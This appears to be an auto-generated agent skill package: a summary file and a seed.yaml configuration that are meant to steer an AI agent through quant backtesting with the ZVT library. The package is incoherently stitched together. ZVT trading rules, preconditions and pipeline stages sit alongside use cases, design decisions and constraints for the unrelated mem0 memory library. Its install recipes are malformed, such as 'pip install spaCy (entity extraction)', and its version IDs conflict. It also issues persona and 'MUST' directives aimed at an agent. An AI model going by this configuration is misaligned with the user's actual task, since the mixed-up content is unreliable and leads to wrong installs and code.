Python 3.10+，至少一个 LLM provider（默认 OpenAI）、一个 embedding provider（默认 OpenAI）、一个 vector store（默认 Qdrant）。本地 SQLite 文件位于 MEM0_DIR（默认 ~/.mem0/）。可选 MEM0_API_KEY 用于托管 MemoryClient。

### 会踩哪些坑？这个 skill 怎么防护？
本 skill 内置 52 条约束，最典型的 4 个：(1) OSS v2.0.0 中传入 graph_store 配置会被 pydantic 静默丢弃，graph 查询无效；(2) PostHog 遥测默认开启，需显式设 MEM0_TELEMETRY=false；

---

完整文档: 见 `references/seed.yaml` (v6.1 schema). 浏览页: https://doramagic.ai/zh/crystal/mem0-memory-layer

FILE:human_summary.md
# finance-bp-131-v6.1 — Human Summary

**Persona**: Doraemon

> I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow. Just tell me what you want; I'll write the code, you don't have to dig docs. (Heads up: ZVT natively supports A-share, HK, and crypto. US stocks — stockus_nasdaq_AAPL — are half-baked; don't bother for serious work.)

## What I Can Do

- Healthcare Assistant (Google ADK)
- AI Study Buddy with Spaced Repetition
- Personal AI Assistant with Image+Text Memory (agno)
- A-share MACD daily golden-cross backtest with hfq price adjustment from eastmoney
- End-to-end ZVT pipeline: FinanceRecorder + GoodCompanyFactor + StockTrader
- Multi-factor strategy with TargetSelector (AND mode) combining MACD + volume breakout
- Index composition data collection (SZ1000, SZ2000) with EM recorder

## What I Auto-Fetch

- ZVT stage pipeline structure (data_collection → visualization) from LATEST.yaml
- Semantic locks (SL-01 through SL-12) — especially sell-before-buy ordering and MACD params
- Fatal constraints (finance-C-*) relevant to your target strategy type
- Default parameters: MACD(12,26,9), hfq adjustment, buy_cost=0.001, base_capital=1M CNY
- Entity ID format (stock_sh_600000) and DataFrame MultiIndex convention
- Provider-specific recorder class names and required class attributes

## What I Ask You

- Target market: A-share (default), HK, or crypto? (US stocks in ZVT are half-baked — stockus_nasdaq_AAPL exists but coverage is thin)
- Data source / provider: eastmoney (free, no account), joinquant (account+paid), baostock (free, good history), akshare, or qmt (broker)?
- Strategy type: MACD golden-cross, MA crossover, volume breakout, fundamental screen, or custom factor?
- Time range: start_timestamp and end_timestamp for backtest period
- Target entity IDs: specific stocks (stock_sh_600000) or index components (SZ1000)?

## Locale Rendering

**Instruction**: On first user contact, translate all fields above into detected user locale while preserving Doraemon persona (direct, frank, mildly snarky, knows limits).

**Preserve verbatim**: BD-IDs, SL-IDs, UC-IDs, finance-C-IDs, class_names, function_names, file_paths, numeric_thresholds

---

*Generated by compile_crystal_skeleton.py v5.0 for finance-bp-131-v6.1*
*All content is English source — agent translates on first user contact.*
FILE:references/seed.yaml
meta:
  id: finance-bp-131-v6.1
  version: v6.1
  blueprint_id: finance-bp-131
  sop_version: crystal-compilation-v6.1
  source_language: en
  compiled_at: '2026-04-25T09:19:02.935254+00:00'
  target_host: openclaw
  authoritative_artifact:
    primary: seed.yaml
    non_authoritative_derivatives:
    - SKILL.md (host-generated summary, may lag)
    - HEARTBEAT.md (host telemetry)
    - memory/*.md (host conversational memory)
    rule: On any behavioral decision (preconditions check, OV assertion, EQ rule firing, spec_lock verification), agents MUST
      re-read seed.yaml. Derivatives are for UI display only and may be out-of-date.
  execution_protocol:
    install_trigger:
    - Execute resources.host_adapter.install_recipes[] in declared order
    - Verify each package with import check before proceeding
    execute_trigger: When user intent matches intent_router.uc_entries[].positive_terms AND user uses action verb (run/execute/跑/执行/backtest/fetch/collect)
    on_execute:
    - Reload seed.yaml (do not rely on SKILL.md or cached summaries)
    - Run preconditions[] in declared order; halt on first fatal failure with on_fail message to user
    - Enter context_state_machine.CA1_MEMORY_CHECKED state
    - Evaluate evidence_quality.enforcement_rules[]; prepend user_disclosure_template
    - Translate user_facing_fields to user locale per locale_contract
    workspace_resolution:
      scripts_path: '{host_workspace}/scripts/'
      skills_path: '{host_workspace}/skills/'
      trace_path: '{host_workspace}/.trace/'
locale_contract:
  source_language: en
  user_facing_fields:
  - human_summary.what_i_can_do.tagline
  - human_summary.what_i_can_do.use_cases[]
  - human_summary.what_i_auto_fetch[]
  - human_summary.what_i_ask_you[]
  - evidence_quality.user_disclosure_template
  - post_install_notice.message_template.positioning
  - post_install_notice.message_template.capability_catalog.groups[].name
  - post_install_notice.message_template.capability_catalog.groups[].description
  - post_install_notice.message_template.capability_catalog.groups[].ucs[].name
  - post_install_notice.message_template.capability_catalog.groups[].ucs[].short_description
  - post_install_notice.message_template.call_to_action
  - post_install_notice.message_template.featured_entries[].beginner_prompt
  - post_install_notice.message_template.more_info_hint
  - preconditions[].description
  - preconditions[].on_fail
  - intent_router.uc_entries[].name
  - intent_router.uc_entries[].ambiguity_question
  - architecture.pipeline
  - architecture.stages[].narrative.does_what
  - architecture.stages[].narrative.key_decisions
  - architecture.stages[].narrative.common_pitfalls
  - constraints.fatal[].consequence
  - constraints.regular[].consequence
  - output_validator.assertions[].failure_message
  - acceptance.hard_gates[].on_fail
  - skill_crystallization.action
  locale_detection_order:
  - explicit_user_declaration
  - first_message_language
  - system_locale
  translation_enforcement:
    trigger: on_first_user_message
    action: Render user_facing_fields in detected locale, preserving all IDs (BD-/SL-/UC-/finance-C-) and code identifiers
      verbatim
    violation_code: LOCALE-01
    violation_signal: User receives untranslated English Human Summary when detected locale != en
evidence_quality:
  declared:
    evidence_coverage_ratio: null
    evidence_verify_ratio: null
    evidence_invalid: 0
    evidence_verified: null
    evidence_auto_fixed: null
    audit_coverage: 20 finance-universal not_applicable + 6 AIL warn + 5 DAT warn/fail + 1 DAT pass = 32 items reviewed across
      applicable scope
    audit_pass_rate: 1/12 (8% applicable items pass; 11 warn/fail/missing capture the architectural boundaries and divergences
      worth surfacing as constraints)
    audit_fail_total: 0
    audit_finance_universal:
      pass: 0
      warn: 0
      fail: 0
    audit_subdomain_totals:
      pass: 0
      warn: 0
      fail: 0
  enforcement_rules:
  - id: EQ-01
    trigger: declared.evidence_verify_ratio < 0.5
    action: MUST invoke traceback lookup for all cited BD-IDs in output before emitting business code — read LATEST.yaml sections
      for each BD referenced
    violation_code: EQ-01-V
    violation_signal: Generated script references BD-IDs but no tool_call to read LATEST.yaml preceded code generation
  - id: EQ-02
    trigger: always
    action: MUST prepend user_disclosure_template (translated to user locale) to first user-facing response
    violation_code: EQ-02-V
    violation_signal: First agent response to user does not contain audit warning phrase
  user_disclosure_template: '[QUALITY NOTICE] This crystal was compiled from blueprint finance-bp-131. Evidence verify ratio
    = 0.0% and audit fail total = 0. Generated results may have uncaptured requirement gaps. Verify critical decisions against
    source files (LATEST.yaml / LATEST.jsonl).'
traceback:
  source_files:
    blueprint: LATEST.yaml
    constraints: LATEST.jsonl
  mandatory_lookup_scenarios:
  - id: TB-01
    condition: Two constraints have apparently conflicting enforcement rules
    lookup_target: LATEST.jsonl — find both constraint IDs, compare `consequence` + `evidence_refs` to determine priority
  - id: TB-02
    condition: A business decision rationale is unclear or disputed
    lookup_target: LATEST.yaml — locate BD-ID under business_decisions, read `rationale` + `alternative_considered` fields
  - id: TB-03
    condition: evidence_invalid > 0 in evidence_quality.declared
    lookup_target: LATEST.yaml _enrich_meta — cross-check specific BD `evidence_refs` fields for invalid markers
  - id: TB-04
    condition: User asks where a rule comes from
    lookup_target: LATEST.jsonl — find constraint by ID, read `confidence.evidence_refs` for source file + line number
  - id: TB-05
    condition: Generated code does not match expected ZVT API behavior
    lookup_target: LATEST.yaml stages[].required_methods — verify method signature and evidence locator in source code
  degraded_lookup:
    no_fs_access: 'Ask the user to paste the relevant LATEST.yaml section or LATEST.jsonl lines for the BD-/finance-C- IDs
      in question. Crystal ID: finance-bp-131-v5.0.'
trace_schema:
  event_types:
  - precondition_check
  - spec_lock_check
  - evidence_rule_fired
  - evidence_rule_skipped
  - locale_translation_emitted
  - hard_gate_passed
  - hard_gate_failed
  - skill_emitted
  - false_completion_claim
preconditions:
- id: PC-01
  description: zvt package installed and importable
  check_command: python3 -c 'import zvt; print(zvt.__version__)'
  on_fail: 'Run: python3 -m pip install zvt  then re-run: python3 -m zvt.init_dirs to initialize data directories'
  severity: fatal
- id: PC-02
  description: K-data exists for target entities (required before backtesting)
  check_command: python3 -c "from zvt.api.kdata import get_kdata; df = get_kdata(entity_ids=['stock_sh_600000'], limit=1);
    assert df is not None and len(df) > 0, 'No kdata found'"
  on_fail: 'Run recorder first: python3 -m zvt.recorders.em.em_stock_kdata_recorder --entity_ids stock_sh_600000  (replace
    with your target entity IDs)'
  severity: fatal
  applies_to_uc: []
- id: PC-03
  description: ZVT data directory initialized (~/.zvt or ZVT_HOME)
  check_command: 'python3 -c "import os; from pathlib import Path; zvt_home = Path(os.environ.get(''ZVT_HOME'', Path.home()
    / ''.zvt'')); assert zvt_home.exists(), f''ZVT home not found: {zvt_home}''"'
  on_fail: 'Run: python3 -m zvt.init_dirs'
  severity: fatal
- id: PC-04
  description: SQLite write permission for ZVT data directory
  check_command: python3 -c "import os, tempfile; from pathlib import Path; zvt_home = Path(os.environ.get('ZVT_HOME', Path.home()
    / '.zvt')); test_f = zvt_home / '.write_test'; test_f.touch(); test_f.unlink()"
  on_fail: 'Check directory permissions: chmod u+w ~/.zvt  or set ZVT_HOME environment variable to a writable location'
  severity: warn
intent_router:
  uc_entries:
  - uc_id: UC-001
    name: Personal AI Assistant with Image+Text Memory (agno)
    positive_terms:
    - personal assistant
    - image memory
    - multimodal memory
    - agno
    data_domain: mixed
    negative_terms:
    - air-gapped deployments (uses hosted MemoryClient)
    - workloads without OpenAI API access
  - uc_id: UC-002
    name: AI Study Buddy with Spaced Repetition
    positive_terms:
    - study assistant
    - spaced repetition
    - learning tracking
    - struggle areas
    data_domain: mixed
    negative_terms:
    - non-educational chatbots
  - uc_id: UC-003
    name: Healthcare Assistant (Google ADK)
    positive_terms:
    - healthcare
    - patient memory
    - Google ADK
    - HIPAA-adjacent
    data_domain: domain_specific
    negative_terms:
    - HIPAA-compliant workloads without caller-side PII redaction (see BD-028)
    - non-medical chatbots
  - uc_id: UC-004
    name: Memory-Aware Movie Recommender (Grok-3 + Qdrant)
    positive_terms:
    - recommender system
    - movie
    - Grok-3
    - local Qdrant
    - 384-dim embedder
    data_domain: behavioral
    negative_terms:
    - workloads needing OpenAI text-embedding-3 quality
  - uc_id: UC-005
    name: Voice Diet Assistant (Cartesia)
    positive_terms:
    - voice assistant
    - diet
    - food preferences
    - Cartesia voice
    data_domain: mixed
    negative_terms:
    - text-only chatbots
  - uc_id: UC-006
    name: Voice Assistant with Persistent Memory (ElevenLabs)
    positive_terms:
    - voice assistant
    - ElevenLabs
    data_domain: mixed
    negative_terms:
    - text-only chatbots
  - uc_id: UC-007
    name: Personalized Search with Stored Preferences
    positive_terms:
    - personalized search
    - preference-aware ranking
    - rerank
    data_domain: behavioral
    negative_terms:
    - global / non-personalized search
  - uc_id: UC-008
    name: Multi-LLM Memory Co-Write
    positive_terms:
    - multi-LLM
    - memory writing
    - extraction comparison
    data_domain: mixed
    negative_terms:
    - simple single-LLM workloads
  - uc_id: UC-009
    name: AWS Strands Agent with Elasticache Vector + Neptune Graph
    positive_terms:
    - AWS
    - Strands
    - Elasticache
    - Neptune graph
    data_domain: mixed
    negative_terms:
    - non-AWS deployments
    - users expecting in-SDK graph configuration (this is a custom integration)
  - uc_id: UC-010
    name: Fitness Tracking Assistant
    positive_terms:
    - fitness
    - workout tracking
    - goals
    data_domain: domain_specific
    negative_terms:
    - non-fitness verticals
  - uc_id: UC-011
    name: Self-Hosted vLLM with mem0
    positive_terms:
    - vLLM
    - self-hosted LLM
    - air-gapped
    data_domain: technical_demo
    negative_terms:
    - users without GPU infrastructure
  - uc_id: UC-012
    name: Multi-Agent Personal Learning System (LlamaIndex)
    positive_terms:
    - multi-agent
    - LlamaIndex
    - AgentWorkflow
    - shared memory
    data_domain: mixed
    negative_terms:
    - single-agent setups
  - uc_id: UC-013
    name: Next.js Mem0 Demo
    positive_terms:
    - Next.js
    - TypeScript SDK
    - web app demo
    data_domain: technical_demo
    negative_terms:
    - Python-only stacks
  - uc_id: UC-014
    name: Multimodal (Image+Text) Vite Demo
    positive_terms:
    - multimodal
    - Vite
    - image + text memory
    data_domain: mixed
    negative_terms:
    - text-only flows
  - uc_id: UC-015
    name: OpenAI Built-in Tools + mem0
    positive_terms:
    - OpenAI Assistants
    - built-in tools
    - file_search
    data_domain: mixed
    negative_terms:
    - non-OpenAI LLM stacks
  - uc_id: UC-016
    name: YouTube Assistant Chrome Extension
    positive_terms:
    - YouTube
    - Chrome extension
    - video assistant
    data_domain: mixed
    negative_terms:
    - non-browser clients
  - uc_id: UC-017
    name: Graph DB Demos (Neo4j / Memgraph / Kuzu / Neptune notebooks)
    positive_terms:
    - graph DB
    - Neo4j
    - Memgraph
    - Kuzu
    - parallel graph
    data_domain: technical_demo
    negative_terms:
    - users expecting graph_store config field in MemoryConfig (does not exist in OSS v2.0.0)
  - uc_id: UC-018
    name: Customer Support Chatbot with Persistent Customer Memory
    positive_terms:
    - customer support
    - persistent memory
    - chatbot
    data_domain: behavioral
    negative_terms:
    - one-shot anonymous queries
  - uc_id: UC-019
    name: AutoGen Multi-Agent + Mem0 Memory
    positive_terms:
    - AutoGen
    - multi-agent
    - shared memory
    data_domain: mixed
    negative_terms:
    - single-agent setups
  - uc_id: UC-020
    name: AutoGen "Teachability" Capability Adapter
    positive_terms:
    - AutoGen
    - Teachability
    - corrections learning
    data_domain: technical_demo
    negative_terms:
    - non-AutoGen frameworks
  - uc_id: UC-021
    name: Canonical retrieve→generate→store Integration Pattern (SKILL.md normative)
    positive_terms:
    - retrieve generate store
    - canonical pattern
    - chat function
    - integration prototype
    data_domain: mixed
    negative_terms:
    - workloads where the integrator wants to skip Phase 2 LLM extraction (use infer=False instead)
context_state_machine:
  states:
  - id: CA1_MEMORY_CHECKED
    entry: Task started
    exit: All memory queries attempted and recorded; memory_unavailable set if failed
    timeout: 30s — skip memory, mark memory_unavailable=true, proceed to CA2
  - id: CA2_GAPS_FILLED
    entry: CA1 complete
    exit: 'All FATAL-priority required inputs answered: target market (A-share/HK/US), data source, time range, strategy type'
    timeout: NOT skippable — FATAL inputs MUST be user-answered before proceeding
  - id: CA3_PATH_SELECTED
    entry: CA2 complete
    exit: intent_router matched single use case with confidence gap > 20% over next candidate, no data_domain ambiguity
    timeout: Trigger ambiguity_question for top-2 candidates, await user selection
  - id: CA4_EXECUTING
    entry: CA3 complete + user explicit confirmation received
    exit: All hard gates G1-Gn passed and output files written
    timeout: NOT skippable — user confirmation of execution path required
  enforcement: Code generation is PROHIBITED before CA4_EXECUTING. Any regression to earlier state MUST be announced to user.
    buy/sell ordering SL-01 check runs at CA4 entry.
spec_lock_registry:
  semantic_locks:
  - id: SL-01
    description: Execute sell orders before buy orders in every trading cycle
    locked_value: sell() called before buy() in each Trader.run() iteration
    violation_is: fatal
    source_bd_ids:
    - BD-018
  - id: SL-02
    description: Trading signals MUST use next-bar execution (no look-ahead)
    locked_value: due_timestamp = happen_timestamp + level.to_second()
    violation_is: fatal
    source_bd_ids:
    - BD-014
    - BD-025
  - id: SL-03
    description: Entity IDs MUST follow format entity_type_exchange_code
    locked_value: stock_sh_600000 | stockhk_hk_0700 | stockus_nasdaq_AAPL
    violation_is: fatal
    source_bd_ids: []
  - id: SL-04
    description: DataFrame index MUST be MultiIndex (entity_id, timestamp)
    locked_value: df.index.names == ['entity_id', 'timestamp']
    violation_is: fatal
    source_bd_ids: []
  - id: SL-05
    description: 'TradingSignal MUST have EXACTLY ONE of: position_pct, order_money, order_amount'
    locked_value: XOR enforcement in trading/__init__.py:68
    violation_is: fatal
    source_bd_ids: []
  - id: SL-06
    description: 'filter_result column semantics: True=BUY, False=SELL, None/NaN=NO ACTION'
    locked_value: factor.py:475 order_type_flag mapping
    violation_is: fatal
    source_bd_ids: []
  - id: SL-07
    description: Transformer MUST run BEFORE Accumulator in factor pipeline
    locked_value: 'compute_result(): transform at :403 before accumulator at :409'
    violation_is: fatal
    source_bd_ids: []
  - id: SL-08
    description: 'MACD parameters locked: fast=12, slow=26, signal=9'
    locked_value: factors/algorithm.py:30 macd(slow=26, fast=12, n=9)
    violation_is: fatal
    source_bd_ids:
    - BD-036
  - id: SL-09
    description: 'Default transaction costs: buy_cost=0.001, sell_cost=0.001, slippage=0.001'
    locked_value: sim_account.py:25 SimAccountService default costs
    violation_is: warning
    source_bd_ids:
    - BD-029
  - id: SL-10
    description: A-share equity trading is T+1 (no same-day close of buy positions)
    locked_value: sim_account.available_long filters by trading_t
    violation_is: fatal
    source_bd_ids: []
  - id: SL-11
    description: Recorder subclass MUST define provider AND data_schema class attributes
    locked_value: contract/recorder.py:71 Meta; register_schema decorator
    violation_is: fatal
    source_bd_ids: []
  - id: SL-12
    description: Factor result_df MUST contain either 'filter_result' OR 'score_result' column
    locked_value: result_df.columns.intersection({'filter_result', 'score_result'}) non-empty
    violation_is: fatal
    source_bd_ids: []
  implementation_hints:
  - id: IH-01
    hint: 'Use AdjustType enum exactly: qfq (pre-adjust), hfq (post-adjust), bfq (none) — contract/__init__.py:121'
  - id: IH-02
    hint: For A-share kdata, default to hfq for long-term analysis (dividend-adjusted) — trader.py:538 StockTrader
  - id: IH-03
    hint: SQLite connection MUST use check_same_thread=False for multi-threaded recorders
  - id: IH-04
    hint: Accumulator state serialization uses JSON with custom encoder/decoder hooks — contract/base_service.py
  - id: IH-05
    hint: Factor.level MUST match TargetSelector.level (enforced at add_factor) — factors/target_selector.py:84
preservation_manifest:
  required_objects:
    business_decisions_count: 33
    fatal_constraints_count: 1
    non_fatal_constraints_count: 51
    use_cases_count: 21
    semantic_locks_count: 12
    preconditions_count: 4
    evidence_quality_rules_count: 2
    traceback_scenarios_count: 5
architecture:
  pipeline: data_collection -> data_storage -> factor_computation -> target_selection -> trading_execution -> visualization
  stages:
  - id: data_collection
    narrative:
      does_what: TimeSeriesDataRecorder and FixedCycleDataRecorder fetch OHLCV and fundamental data from providers (eastmoney,
        joinquant, baostock, akshare) and persist domain objects (Stock1dKdata, BalanceSheet) to SQLite via df_to_db().
      key_decisions: BD-002 chose evaluate_start_end_size_timestamps for incremental fetch (not full refresh) because comparing
        to get_latest_saved_record avoids redundant API calls; BD-003 chose get_data_map field transformation to keep domain
        schema provider-agnostic.
      common_pitfalls: 'Don''t forget SL-11: Recorder subclass MUST declare both provider and data_schema class attributes
        else initialization fails with assertion error; finance-C-001 fatal violation.'
    business_decisions: []
  - id: data_storage
    narrative:
      does_what: StorageBackend persists DataFrames to per-provider SQLite databases at {data_path}/{provider}/{provider}_{db_name}.db
        using path templates from _get_path_template; Mixin.record_data and Mixin.query_data provide uniform read/write interface.
      key_decisions: BD-004 chose StorageBackend abstraction (not hardcoded SQLite) to allow future cloud storage swap; BD-006
        derives db_name from data_schema __tablename__ for per-domain database isolation.
      common_pitfalls: SL-04 violation (wrong DataFrame index) causes factor pipeline failures downstream; always ensure df.index.names
        == ['entity_id', 'timestamp'] before calling record_data.
    business_decisions: []
  - id: factor_computation
    narrative:
      does_what: Factor.compute() applies Transformer (stateless, e.g. MacdTransformer) then Accumulator (stateful, e.g. MaStatsAccumulator)
        to produce filter_result or score_result columns; EntityStateService persists per-entity rolling state across batches.
      key_decisions: BD-007 chose Factor inheriting DataReader for composable data access; SL-08 locks MACD at (fast=12, slow=26,
        n=9) — chose standard Appel parameters not adaptive because interpretability matters for practitioners.
      common_pitfalls: 'SL-07: Transformer MUST run before Accumulator — swapping order causes NaN propagation; SL-12: result_df
        must contain filter_result OR score_result column or TargetSelector silently drops all signals.'
    business_decisions: []
  - id: target_selection
    narrative:
      does_what: TargetSelector.add_factor() registers Factor instances; get_targets() returns entity_ids passing threshold
        filter at a specific timestamp, enabling point-in-time historical backtesting without look-ahead.
      key_decisions: BD-012 chose registrable factor list (not hardcoded) for runtime customization; BD-013 chose timestamp-specific
        filtering not current-only because backtests need historical point-in-time correctness.
      common_pitfalls: Factor.level MUST match TargetSelector.level (IH-05); mismatched levels cause silent empty target lists
        that look like no signals but are actually level-mismatch bugs.
    business_decisions: []
  - id: trading_execution
    narrative:
      does_what: Trader.run() calls sell() before buy() each cycle, generates TradingSignals with due_timestamp = happen_timestamp
        + level.to_second() for next-bar execution, and applies on_profit_control() for stop-loss/take-profit before regular
        target selection.
      key_decisions: SL-01 locks sell-before-buy order because available_long check in sim_account depends on it — chose this
        over symmetric ordering to prevent implicit leverage; BD-039 chose long=AND/short=OR multi-level logic to reflect
        risk asymmetry.
      common_pitfalls: 'SL-02 violation (immediate execution instead of next-bar) introduces look-ahead bias and makes backtest
        results unreproducible in live trading; SL-10: A-share T+1 constraint — backtesting without it overstates returns.'
    business_decisions: []
  - id: visualization
    narrative:
      does_what: Drawer.draw() combines kline main chart with factor overlays and Rect annotations for entry/exit signals
        using Plotly; Drawable interface on Factor enables consistent chart rendering across data types.
      key_decisions: BD-019 chose drawer_rects subclass override for custom annotations not hardcoded markers — allows traders
        to define entry/exit visuals without modifying base drawing logic.
      common_pitfalls: draw_result=True by default (BD-055) is fine for development but set draw_result=False in production/headless
        environments to avoid Plotly server startup overhead.
    business_decisions: []
  - id: cross_cutting_concerns
    narrative:
      does_what: 'Invariants and utilities that span multiple pipeline stages — collected from 8 source groups: context_gather(1),
        cross_cutting(8), dedup_md5(1), entity_extract(2), hybrid_search(11), llm_extract(3), and 2 more.'
      key_decisions: 33 BDs merged here because they apply to more than one main stage (e.g. algorithm helpers, default value
        choices, ordering contracts, error handling). Agent should inspect individual BD summaries and link back to affected
        main stages via shared IDs.
      common_pitfalls: Cross-cutting concerns frequently surface as bugs when changes to one main stage unintentionally break
        another. Check constraints referencing these BDs and verify invariants still hold after any stage-local modification.
    business_decisions:
    - id: BD-001
      type: B
      summary: Memory.add() and Memory.search() are deliberately NOT in MemoryBase abstract surface
    - id: BD-026
      type: missing
      summary: No graph store integration in core SDK v2.0.0 OSS despite AGENTS.md doc claim
    - id: BD-027
      type: missing
      summary: No batched-tx retry / rollback on partial vector-store insert failure in _add_to_vector_store
    - id: BD-028
      type: missing
      summary: No PII redaction in vector-store payloads
    - id: BD-029
      type: missing
      summary: No rate-limiting / token-budget enforcement on the LLM extraction call
    - id: BD-030
      type: missing
      summary: Hosted-vs-OSS async-processing semantics not disambiguated in SKILL.md
    - id: BD-031
      type: missing
      summary: No multi-vendor LLM fallback when extraction returns malformed JSON
    - id: BD-032
      type: missing
      summary: No data-versioning / tombstone in vector store — delete() is hard-delete
    - id: BD-033
      type: missing
      summary: No length cap on memory text stored in payload
    - id: BD-005
      type: B/BA
      summary: Hash-based dedup uses md5(text), NOT semantic similarity
    - id: BD-009
      type: BA/M
      summary: Entity dedup threshold = score >= 0.95 cosine similarity (top_k=1 search vs new insert)
    - id: BD-023
      type: M/B
      summary: Entity extraction uses spaCy NER (deterministic NLP), NOT LLM
    - id: BD-004
      type: B/BA
      summary: Reranker is OFF by default (MemoryConfig.reranker=None AND search(rerank=False))
    - id: BD-006
      type: BA
      summary: Default search threshold = 0.1 with validation to [0,1]
    - id: BD-007
      type: B
      summary: Default top_k = 20 for search() and get_all()
    - id: BD-008
      type: M/BA
      summary: internal_limit = max(top_k*4, 60) over-fetch ratio
    - id: BD-010
      type: M/BA
      summary: ENTITY_BOOST_WEIGHT = 0.5 in fusion formula
    - id: BD-011
      type: M
      summary: BM25 normalization via length-adaptive logistic sigmoid with hardcoded breakpoints (≤3, ≤6, ≤9, ≤15 terms)
    - id: BD-012
      type: B/BA
      summary: Threshold gate APPLIES TO SEMANTIC SCORE ONLY (BM25 / entity-boost cannot rescue sub-threshold candidates)
    - id: BD-014
      type: B/RC
      summary: Filters MUST contain user_id OR agent_id OR run_id (raises ValueError otherwise)
    - id: BD-015
      type: B
      summary: Top-level entity kwargs are REJECTED in v3 (must use filters={...} dict syntax)
    - id: BD-017
      type: B/T
      summary: AsyncMemory uses asyncio.to_thread, NOT async-native client APIs
    - id: BD-018
      type: B
      summary: Memory.chat() raises NotImplementedError — no built-in retrieve-and-answer loop
    - id: BD-003
      type: B
      summary: Default LLM and embedder = OpenAI; default reranker provider = cohere (only when user instantiates RerankerConfig
        without args)
    - id: BD-013
      type: B
      summary: infer=True default for add() = LLM extracts facts; infer=False = raw message stored as-is
    - id: BD-024
      type: B/T
      summary: 'JSON-mode response_format used for the extraction LLM call: {"type": "json_object"}'
    - id: BD-016
      type: B/T
      summary: messages table evicts to most-recent 10 per session_scope on every save_messages
    - id: BD-019
      type: B
      summary: PostHog telemetry ON by default with hardcoded vendor API key; sampling rate 0.1 hot-path, 1.0 lifecycle
    - id: BD-020
      type: T
      summary: MD5 of caller IDs in telemetry payload
    - id: BD-021
      type: T/B
      summary: History db default path = ~/.mem0/history.db (env override MEM0_DIR)
    - id: BD-022
      type: B
      summary: Schema migration is automatic on first instantiation if old history table is detected
    - id: BD-002
      type: B
      summary: Default vector store provider is Qdrant
    - id: BD-025
      type: B/M
      summary: UUID-to-integer mapping in extraction prompt (anti-hallucination)
resources:
  packages:
  - name: pydantic v2
    version_pin: latest
  - name: spaCy (entity extraction)
    version_pin: latest
  - name: posthog (telemetry client)
    version_pin: latest
  strategy_scaffold:
    entry_point_name: run_backtest
    output_path: result.csv
    execution_mode: backtest
    conditional_entry_points:
      backtest:
        entry_point_name: run_backtest
        output_path: result.csv
      collector:
        entry_point_name: run_collector
        output_path: result.json
      factor:
        entry_point_name: run_factor
        output_path: result.parquet
      training:
        entry_point_name: run_training
        output_path: result.json
      serving:
        entry_point_name: run_server
        output_path: result.json
      research:
        entry_point_name: run_research
        output_path: result.json
    tail_template: "# === DO NOT MODIFY BELOW THIS LINE ===\nif __name__ == \"__main__\":\n    result = run_backtest()  #\
      \ implement above\n    from validate import enforce_validation\n    enforce_validation(result, output_path=\"{workspace}/result.csv\"\
      )\n# === END DO NOT MODIFY ==="
  host_adapter:
    target: openclaw
    timeout_seconds: 1800
    shell_operator_restriction: 'exec tool intercepts && / ; / | — never chain: ''pip install X && python Y''. Use separate
      exec calls.'
    install_recipes:
    - python3 -m pip install pydantic v2
    - python3 -m pip install spaCy (entity extraction)
    - python3 -m pip install posthog (telemetry client)
    - python3 -m pip install zvt
    credential_injection: JoinQuant/QMT credentials require user-side '!' prefix shell login. Never hardcode credentials in
      generated scripts.
    path_resolution: '{workspace} resolves to ~/.openclaw/workspace/doramagic at execution time.'
    file_io_tooling: Use openclaw 'write' tool for .py/.sql files; 'exec' tool for python3 /absolute/path/script.py (absolute
      paths only).
constraints:
  fatal:
  - id: mem0-C-001
    when: When configuring MemoryConfig for self-hosted Memory in OSS v2.0.0 following AGENTS.md/LLM.md graph examples
    action: Do not include any graph_store / graph_db / graph kwarg in MemoryConfig; treat graph memory as hosted-platform-only
      or use out-of-tree integration (UC-009 strands_agent / UC-017 examples/graph-db-demo notebooks). Surface the gap explicitly
      in your skill or wrapper so users see a hard error rather than silent no-op.
    severity: fatal
    kind: domain_rule
    modality: must_not
    consequence: null
  regular:
  - id: mem0-C-002
    when: When selecting an LLM/vector/embedder/graph/reranker provider for OSS v2.0.0 Python SDK based on documentation
    action: Always confirm provider availability against utils/factory.py provider_to_class dicts (LlmFactory L37-56, VectorStoreFactory
      L168-193, EmbedderFactory L140-152, RerankerFactory L220-226). Do not use AGENTS.md L362-369 numbers as the source of
      truth.
    severity: medium
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: mem0-C-003
    when: When integrating self-hosted Memory and reading SKILL.md L135 'Wait 2-3s after add() before searching'
    action: 'For self-hosted Memory: call search() immediately after add() with no sleep. For hosted MemoryClient: keep the
      2-3s wait or use mem0 event list for status polling. Distinguish the two modes explicitly in any wrapper or skill you
      build.'
    severity: high
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: mem0-C-004
    when: When deploying mem0 OSS in any environment with privacy/compliance requirements or before forking the SDK
    action: 'Set MEM0_TELEMETRY=false in env BEFORE first Memory() instantiation; OR fork mem0/memory/telemetry.py L15 PROJECT_API_KEY
      to your own PostHog. Note: caller IDs are MD5-hashed in mem0/memory/utils.py:200-215, but vector store class FQN, embedder
      class FQN, function path, and event timing still leak. Anonymous user_id is generated silently with no install-time
      consent prompt.'
    severity: high
    kind: domain_rule
    modality: should
    consequence: null
  - id: mem0-C-005
    when: When wiring mem0 into an agent and looking for a built-in chat/answer method
    action: 'Implement the SKILL.md ''Common integration pattern'' (L101-131) yourself: (1) memory.search(query, filters={''user_id'':...})
      to retrieve context, (2) call your own LLM with the memories as system context, (3) memory.add([{role:''user'',content:...},{role:''assistant'',content:...}],
      user_id=...) to store the exchange. Do not assume chat() is implemented in any future minor version without checking
      the source.'
    severity: medium
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: mem0-C-006
    when: When calling Memory.add(), Memory.search(), or Memory.get_all() in v2.0.0 OSS (which ships v3 search semantics)
    action: 'Always pass entity scope inside filters dict: filters={''user_id'': ''alice''} or filters={''agent_id'': ''bot1''}
      or filters={''run_id'': ''session-42''}. Do not pass user_id, agent_id, run_id as top-level kwargs. At least one of
      the three keys must be present, otherwise _validate_filters raises ValueError.'
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: mem0-C-007
    when: When designing memory ingestion volume and expecting near-duplicate consolidation at scale
    action: 'Treat dedup correctness as conditional on top-10 retrieval quality + LLM extraction quality. To raise consolidation
      rate: (a) shrink session_scope so the top-10 cap covers more of the relevant history; (b) consider periodic offline
      consolidation jobs that re-run extraction over the full corpus; (c) do not increase top-10 cap arbitrarily without measuring
      LLM prompt-budget impact.'
    severity: medium
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: mem0-C-008
    when: When tuning the search() threshold parameter for retrieval quality
    action: Keep threshold ≤ noise-floor of your embedder family (OpenAI text-embedding-3 is ~0.3-0.4; the 0.1 default is
